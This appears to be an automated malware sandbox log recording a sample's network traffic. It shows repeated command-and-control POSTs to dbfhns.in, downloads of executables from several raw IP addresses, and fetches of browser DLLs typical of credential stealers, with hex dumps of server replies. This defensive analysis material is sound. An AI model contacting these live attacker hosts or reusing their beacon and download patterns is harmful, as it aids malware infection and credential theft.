Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://etetxpvheghmlur.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://spdxbqopubx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pxinixbdcjjccvdo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 343Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://euirtythbemo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://btndjessgdxlt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nfymgppnbopwxnwd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ckgltynaavllsolq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hbtkypdfbiu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://haglmiwlgvefe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dnvpkenpnlmca.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qvgxhyimdjdqth.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: dbfhns.in

Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86
Source: unknown	TCP traffic detected without corresponding DNS query: 45.129.96.86

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Code function: 12_2_6D0CCC60 PR_Recv,

12_2_6D0CCC60

Source: global traffic	HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 37.27.34.12Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic	HTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
Source: global traffic	HTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
Source: global traffic	HTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231

Source: katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmp

Source: global traffic	DNS traffic detected: DNS query: dbfhns.in
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: whispedwoodmoodsksl.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com

Source: unknown

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ed Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2d 5e 24 17 a6 61 44 a2 ae 09 ab c8 ad ac 2b 98 2b 9a ed 33 5e 14 98 8f c1 cb 7c d1 Data Ascii: #\-^$aD++3^\|
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:23:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2b 58 24 17 a0 6d 44 af a8 09 a2 cc b6 e5 32 9d 20 c1 e0 2a 0b 19 9a c4 8a d6 61 Data Ascii: #\+X$mD2 *a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 27 May 2024 13:24:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 20 5a 24 14 a4 6a 44 a9 ab 14 bd cc b1 fb 6d 87 2a d3 ab 77 5f 07 98 d9 8a da 63 c6 2a 1d 01 8b 0a 8c 5e 6e 55 53 b5 91 73 f2 73 ed 44 19 13 Data Ascii: #\ Z$jDmw_c^nUSssD
